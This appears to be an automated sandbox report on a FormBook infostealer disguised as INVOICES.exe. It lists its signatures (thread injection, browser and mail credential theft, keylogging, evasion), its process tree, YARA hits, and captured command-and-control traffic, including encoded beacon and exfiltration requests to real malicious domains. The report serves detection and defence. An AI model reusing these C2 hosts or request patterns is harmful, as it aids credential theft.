
Windows Analysis Report
INVOICES.exe

Overview

General Information

Sample name: INVOICES.exe
Analysis ID: 1544728
MD5: 90c8ef1083fbf63ae33f23d51513a611
SHA1: 28513b7108e382d811902d22d3749568adf296eb
SHA256: bfd180717755dd026fcbc5b370cea34a1ed365deb5e512420b63a5382f111764
Tags: exe, Formbook, user-Racco42

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • INVOICES.exe (PID: 7836 cmdline: "C:\Users\user\Desktop\INVOICES.exe" MD5: 90C8EF1083FBF63AE33F23D51513A611)
    • svchost.exe (PID: 7900 cmdline: "C:\Users\user\Desktop\INVOICES.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XORjEgwNIUb.exe (PID: 6112 cmdline: "C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • AtBroker.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
          • XORjEgwNIUb.exe (PID: 5072 cmdline: "C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7636 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\INVOICES.exe", CommandLine: "C:\Users\user\Desktop\INVOICES.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INVOICES.exe", ParentImage: C:\Users\user\Desktop\INVOICES.exe, ParentProcessId: 7836, ParentProcessName: INVOICES.exe, ProcessCommandLine: "C:\Users\user\Desktop\INVOICES.exe", ProcessId: 7900, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\INVOICES.exe", CommandLine: "C:\Users\user\Desktop\INVOICES.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INVOICES.exe", ParentImage: C:\Users\user\Desktop\INVOICES.exe, ParentProcessId: 7836, ParentProcessName: INVOICES.exe, ProcessCommandLine: "C:\Users\user\Desktop\INVOICES.exe", ProcessId: 7900, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: INVOICES.exe; ReversingLabs: Detection: 47%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: INVOICES.exe; Joe Sandbox ML: detected
Source: INVOICES.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XORjEgwNIUb.exe, 00000004.00000002.3876547511.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3876353639.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ATBroker.pdb source: svchost.exe, 00000002.00000003.1619091863.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618993027.000000000301B000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000003.1948840175.0000000000D2B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: INVOICES.exe, 00000000.00000003.1410165013.0000000003880000.00000004.00001000.00020000.00000000.sdmp, INVOICES.exe, 00000000.00000003.1410750742.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553555103.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1551393196.0000000003200000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1693952018.0000000004385000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.00000000046F0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1696017970.000000000453E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.000000000488E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: INVOICES.exe, 00000000.00000003.1410165013.0000000003880000.00000004.00001000.00020000.00000000.sdmp, INVOICES.exe, 00000000.00000003.1410750742.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1553555103.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1551393196.0000000003200000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000005.00000003.1693952018.0000000004385000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.00000000046F0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1696017970.000000000453E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.000000000488E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: AtBroker.exe, 00000005.00000002.3881258314.0000000004D1C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.000000002684C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000002.00000003.1619091863.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618993027.000000000301B000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000003.1948840175.0000000000D2B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: AtBroker.exe, 00000005.00000002.3881258314.0000000004D1C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.000000002684C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_0079449B GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0079449B
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_0079C75D FindFirstFileW,FindClose, 0_2_0079C75D
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_0079C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0079C7E8
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_0079F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0079F021
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_0079F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0079F17E
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_0079F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0079F47F
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_00793833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00793833
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_00793B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00793B56
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_0079BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0079BD48
Source: C:\Windows\SysWOW64\AtBroker.exe; Code function: 5_2_0035C720 FindFirstFileW,FindNextFileW,FindClose, 5_2_0035C720
Source: C:\Windows\SysWOW64\AtBroker.exe; Code function: 4x nop then xor eax, eax 5_2_00349DE0
Source: C:\Windows\SysWOW64\AtBroker.exe; Code function: 4x nop then mov ebx, 00000004h 5_2_044304DF

Networking

Source: DNS query: www.68529.xyz
Source: Joe Sandbox View; IP Address: 13.248.169.48
Source: Joe Sandbox View; IP Address: 199.59.243.227
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
Source: C:\Users\user\Desktop\INVOICES.exe; Code function: 0_2_007A2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_007A2404
Source: global traffic; HTTP traffic detected: GET /hzvv/?mRR=Vxudf0fHzLw84n3P&edD=rORncVVdvgzWlpxqVdy6wyOp/+Tf7AwoM18MThSKdmZP0ohcmrwEBuX8zFjiIhpadHd1pz5OrNzpltMAb4bxQj9ydLcasKlfpoifhU3jpBZMJYPNfPfapl2Jiho/Qt0KOg== HTTP/1.1; Host: www.dpo-medicina.online; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /026w/?edD=lYgGcuisybLP7Ls1fGp6HIm4b0bJG5Li1NyGnRgJosPR9gPGPpYXP8moMcmegmveynv5+gYGX20ShvoOLspZRc66KMIi0XTCODv4m7XI1igXQNISi3YQnFgtoSZ+M/H7bQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.gold-rates.online; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /b8ns/?edD=AHsT2lQM7afkvhgrd3a+ObbJ1OaVFxW6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0tAUFBubyxcqdahqlM3D7pXLIOqGlrWJuLpzoNBd4O/a7Q==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.loginov.enterprises; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /1t94/?edD=gjMIJwSCW/9UgfmDC9v9JuEAXY9+Tk/wxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjZ5WYlhZ6IbItanfVRefUclVTIAe/3x+VFj+y2sVXiouoQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.2925588.com; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /pq4g/?mRR=Vxudf0fHzLw84n3P&edD=/x7ZrZ76GI+PVQICx+fJsRsDfPwUjqoVDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD5OWdqbGxCnsQwRTx3/JOzhGR6ZHHmQh6NCPA8f1t14f7g== HTTP/1.1; Host: www.treatyourownhip.online; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /4sq5/?edD=auinYk/N7fzuxFx7OuKPDQsKV8iAhIfXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFEBF2GjT/+1q0RocL006XFUWck2TAJQGogQWHAk4IwcjPQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.premium303max.rest; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /xene/?mRR=Vxudf0fHzLw84n3P&edD=oQfmtMAR504qWoEoIiuXkIZ390sDtx871CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEvd3KGx73JHR40wuRl04yT55myu+mdIWD34OfxSC3JH3Pw== HTTP/1.1; Host: www.adsdomain-195.click; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /mivl/?edD=NCBdkbAo51Pk6OQCOHBLNPGGoFWb7jFDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK6r1gpJDlK+mMheAcqBYNXKJFvncR+Lje3KwNZ7V3SHyOg==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.broork.sbs; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /uye5/?mRR=Vxudf0fHzLw84n3P&edD=75F1ULhw6FwEjpnDA0ShEFdlFdwdGFO+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rOrOasIwOIgL2b+vXbiOxUsIxCPoWDvEXykJs0FHlhf94g== HTTP/1.1; Host: www.nutrigenfit.online; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /ak8m/?edD=rnlDhCsdJ2ooBNmRxWrIjnPAthAEmDTBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQjaYFwN3T3JuEHWt+eu64/V1Op0q2QF2dqSePIe0BpSPtA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.plyvik.info; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /2su7/?edD=pamwepkWr5FhGLIp9e9dE5wxTwNKoV0OitnUuyON/V0YdhH090qorkisWAKc74xRI1QLgpFLJyIK92bUXzceQHZBiR72PVsC64CKK1bLyHz9EtZqc0FSRzmTtcqhmMmMlg==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.68529.xyz; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /taxt/?edD=r1Iubw6Wh8IGmXw0YJVaMoRCD3peRXEmz6ievL1zkHtXMQX/g3sK5IHJ6rQ7ggOc23QC6zmWJBnuHS8GGugfDzOdB1VYvGABqxLnspqtMyj1CdMgVpHhi3ZxRPJaa26iDA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.bulbulun.net; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /trf9/?edD=SX2oC5m45uYB1tV1xPAlHQ9pkf41HJggIgPCWZhvHUcjHM/w8Nd3jQ2tXPB/QOacw2gE0ne7LAGFXkFnbZ4l5ULW4r3r0ogn7NokvyLyFgbvViqVA80wJ4db34DSXGAE4g==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.smithsmobilewash.net; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /phwy/?edD=NOQPwZ+XOddShCAJaqjiSDvaSyosQYNdt8f0tOcuwTalyoR7fBY1X5bax8h0+UleX8GnGxtat7FR1fTM5b1BgdcwV2K5MrO24q3i2hacl5vfdQcLdxPRe77ACw5W73Ddrw==&mRR=Vxudf0fHzLw84n3P HTTP/1.1; Host: www.2q33e.top; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: www.dpo-medicina.online
Source: global traffic; DNS traffic detected: DNS query: www.gold-rates.online
Source: global traffic; DNS traffic detected: DNS query: www.loginov.enterprises
Source: global traffic; DNS traffic detected: DNS query: www.2925588.com
Source: global traffic; DNS traffic detected: DNS query: www.treatyourownhip.online
Source: global traffic; DNS traffic detected: DNS query: www.premium303max.rest
Source: global traffic; DNS traffic detected: DNS query: www.adsdomain-195.click
Source: global traffic; DNS traffic detected: DNS query: www.broork.sbs
Source: global traffic; DNS traffic detected: DNS query: www.nutrigenfit.online
Source: global traffic; DNS traffic detected: DNS query: www.plyvik.info
Source: global traffic; DNS traffic detected: DNS query: www.68529.xyz
Source: global traffic; DNS traffic detected: DNS query: www.bulbulun.net
Source: global traffic; DNS traffic detected: DNS query: www.smithsmobilewash.net
Source: global traffic; DNS traffic detected: DNS query: www.2q33e.top
Source: global traffic; DNS traffic detected: DNS query: www.tangible.online
                Source: unknownHTTP traffic detected: POST /026w/ HTTP/1.1Host: www.gold-rates.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.gold-rates.onlineReferer: http://www.gold-rates.online/026w/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 204User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36Data Raw: 65 64 44 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 31 72 39 4c 47 67 42 54 66 37 43 47 55 6c 7a 55 47 37 6a 6a 37 73 79 4b 6d 32 46 4f 68 4e 75 7a 6e 54 50 44 62 36 52 38 62 6f 32 48 47 63 75 4e 72 32 58 51 69 33 2b 4a 68 54 6f 41 41 6d 4a 6d 6e 64 64 58 41 38 63 65 62 6f 65 61 41 50 6f 46 34 55 66 43 63 79 36 30 6e 35 6e 31 77 78 42 56 54 4f 51 57 6f 6e 38 4f 6f 43 67 52 78 6a 6c 56 41 70 53 4b 50 55 6f 66 6a 62 75 4a 37 54 43 55 75 68 54 4b 57 55 7a 4f 52 6c 57 74 6b 59 5a 42 57 57 36 43 77 74 2b 45 62 6b 65 46 66 71 5a 59 2b 76 36 55 6c 75 4f 47 64 48 36 58 2f 41 4e 49 58 4f 4d 6e 79 36 44 75 71 63 34 3d Data Ascii: edD=oaImfau1/9zZ1r9LGgBTf7CGUlzUG7jj7syKm2FOhNuznTPDb6R8bo2HGcuNr2XQi3+JhToAAmJmnddXA8ceboeaAPoF4UfCcy60n5n1wxBVTOQWon8OoCgRxjlVApSKPUofjbuJ7TCUuhTKWUzORlWtkYZBWW6Cwt+EbkeFfqZY+v6UluOGdH6X/ANIXOMny6Duqc4=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:54:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 35 31 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 64 70 6f 2d 6d 65 64 69 63 69 6e 61 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 
